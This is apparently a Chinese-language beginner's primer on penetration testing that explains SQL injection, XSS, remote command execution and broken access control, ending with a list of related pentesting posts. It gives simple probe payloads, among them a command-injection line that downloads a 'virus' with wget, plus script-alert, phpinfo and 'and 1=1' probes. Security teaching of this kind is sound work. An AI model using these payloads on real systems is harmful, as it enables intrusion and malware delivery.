【KBOX】渗透测试学前知识
什么是渗透测试
渗透测试是渗透测试工程师通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法
基本素质
清晰思路、过硬技术、持久细节、沟通能力、职业素养、良好品德
Web漏洞类型
SQL注入、XSS、远程命令执行、越权
SQL注入
通过把SQL命令插入到Web表单提交,或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
select * from username = "test" or ""="" and password="123456"
XSS
攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入Web里面的Script代码会被执行, 从而达到恶意攻击用户的目的
<p style='color:red'>你好,尊敬的xxx<script>alert(/XSS/)<script></p>
远程命令执行
用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致执行命令
ping www.example.com & wget www.target.com/virus
(wget是一个下载文件的工具,用在命令行下,支持HTTP、HTTPS和FTP协议,可以使用HTTP代理。wget可以在用户退出系统之后在后台执行,wget非常稳定,在带宽很窄的情况下和不稳定网络中有很强的适应性,若由于网络的原因下载失败,wget会不断的尝试直到整个文件下载完成)
越权
一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序管理员的疏忽,即对信息进行增删改查的时候不进行对 所需要操作的信息是否属于对应的用户 的判断,这会导致用户A可以操作其他人的信息
Cookie:uid=1
数据的传输过程(用户的输入到处理到输出)中会出现的漏洞及原因
- 输入(浏览器)
DOM型XSS:修改浏览器端DOM环境来执行攻击脚本
(文档对象模型,DOM,是一种与平台和语言无关的应用程序接口即API,它可以动态访问程序和脚本,更新其内容、结构和www文档的风格。DOM是一种基于树的API文档,要求在处理过程中整个文档都表示在存储器中)
//简单利用方式:
?id=1%0D%0Alocation:http://www.baidu.com
?id=1;phpinfo();
?id=1 and 1=1
?id=<script>alert(1)</script>
- 中间件
解析漏洞:利用web server本身功能特性进行攻击
弱口令:管理中间件的口令易被猜解
远程命令执行:中间件本身漏洞导致
//简单利用方式:
GET /?id=1 HTTP/1.1 Location:http://www/baidu.com
GET /?id=1%3Bphpinfo%28%29 HTTP/1.1
GET /?id=1%20and%201%3D1 HTTP/1.1
GET /?id=%3Cscript%3Ealert%281%29%3C%2fscript%3E HTTP/1.1
- 脚本解析器
代码注入:将字符转化为代码时未过滤用户输入
文件包含:被引用的文件外部可控
上传漏洞:未严格验证上传文件格式
任意下载:对用户要下载的文件未做严格限制
//简单利用方式:
eval("\$a=$_GET['id']");
eval("\$a=1;phpinfo();");
eval("\$a=1 and 1=1;");
eval("\$a=<script>alert(1)</script>");
- 数据库:
SQL注入:未对外部输入的输入过滤就直接带入数据库进行查询
弱口令:数据库的登录口令易被猜解
未授权访问:数据库未开启认证
//简单利用方式:
SELECT password FROM admin WHERE id = $_GET['id'];
SELECT password FROM admin WHERE id = 1;phpinfo();
SELECT password FROM admin WHERE id = 1 and 1=1;
SELECT password FROM admin WHERE id = <script>alert(1)</script>
- 输出(浏览器)
反射型XSS:输入、输出数据时未进行过滤
存储型XSS:输入、输出数据时未进行过滤
界面操作劫持:利用透明层和iframe劫持用户的操作
//简单利用方式:
302跳转
phpinfo()信息
<p>password</p>
<p><script>alert(1)</script></p>
中间件
中间件是一类连接软件组件和应用的计算机软件,它包括一组服务,以便于运行在一台或多台机器上的多个软件通过网络进行交互。它包括web服务器、事务监控器和消息队列软件。中间件处于 操作系统软件 与 用户的应用软件 的中间
脚本解释器
解释器是一种电脑程序,把高级编程语言一行一行地直接转译运行。解释器不会一次把整个程序转译出来,每次运行程序时都要先转成另一种语言再运行,所以解释器的程序运行速度比较缓慢。关键点是,每转译一行程序叙述就立刻运行,再转译下一行再运行
数据库
SQL,结构化查询语言,是专为数据库而建立的操作命令集,是数据库语言
【KBOX】渗透测试学前知识相关推荐
- CISP-PTE注册信息安全专业人员渗透测试工程师知识体系大纲
CISP-PTE注册信息安全专业人员渗透测试工程师知识体系大纲 都是图.. 不足之处,欢迎补充 转载于:https://www.cnblogs.com/wushangguo/p/9059372.htm ...
- web安全渗透测试基础知识
渗透测试入门 渗透测试前置知识 靶场环境搭建 windows基础 网络基础 web应用/架构搭建/站库分离/路由访问 web四大件-系统 web四大件-中间件 web四大件-数据库 web四大件-源码 ...
- 如何了解渗透测试域名知识讲解
网站上线前需要对网站进行渗透测试,上一节我们Sine安全讲师讲了web的基础知识了解,明白了具体web运行的基础和环境和协议,这一节我们来讨论下域名和DNS工作原理以及http状态码和请求的协议来分析 ...
- 渗透测试入门16之渗透测试基本知识
进程:进程是程序在计算机上的一次执行活动,当运行一个程序时就启动一个进程.程序是静态的,进程是动态的.进程分为系统进程和用户进程. 管理进程的方法: 1.系统自带的任务管理器 2.Windows进程管 ...
- 素问 —渗透测试基本知识
基本常识内容 什么是IP IP 其实就是一个计算机地址 就像我们日常生活中的门牌地址一样 什么是域名 说白了其实域名就是网站 如 www.baidu.com 域名可以让我们方便记忆 域名和ip 相互映 ...
- APP应用渗透测试思路
今天继续给大家介绍渗透测试相关知识,本文主要内容是APP应用渗透测试思路. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强调:严禁对未授 ...
- Linux无文件木马程序渗透测试复现
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux无文件木马程序渗透测试复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负! 再次强 ...
- 网络安全千万条,渗透测试第一条
说起网络安全,很多人对此并不敏感,在便利的互联网之下其实有很多看不见的危险. 比如澳大利亚某州3万雇员个人信息被泄露.委内瑞拉全国停电.俄罗斯20多家大型企业被未知者勒索.美国第七大银行数据库被入侵- ...
- 渗透测试工程师(NISP-PT)
第一阶段:网络安全基础知识(2周) [学生可掌握的核心能力] 1.能够根据企业办公环境和信息点数,为企业组建中小型企业网络,并能指导实施; 2.能够根据网络拓扑图,根据企业需求,配置路由器与交换机,实 ...
最新文章
- python机器学习包
- 路由器的基本配置--荣新IT培训带给我的......(三)
- Apollo进阶课程㊷丨Apollo实战——车辆与循迹驾驶能力实战
- android 二级 滚动,android使用 ScrollerView 实现 可上下滚动的分类栏实例
- append 注意事项
- C#Brush的使用(转载)
- linux屏幕获取分辨率方法,Android 获取屏幕的分辨率
- 「Android - SoundPool使用」
- FlashFXP 5.4.0注册码
- ubuntu18下查看opencv版本、多版本之间的共存,切换、下载地址
- 树莓派python实现二维码识别——ZBar
- UltraLAB台式图形工作站(独门绝技~多核+超高频~极速计算工作站H490介绍)
- 超好用的内网穿透工具【永久免费不限制流量】
- 贪心算法之田忌赛马(超详细)
- 计算机无法登陆账户 让注销,电脑开机出现登陆账户,点了以后就马上注销,怎么处理?...
- unity导入模型呈现紫色解决方法
- MACD指标5种背离分析(图解)
- 黑苹果 win10双系统问题
- 苹果cms V10模板主题|白色简约风格自适应模板下载
- 立体五子棋中的一个有趣的bug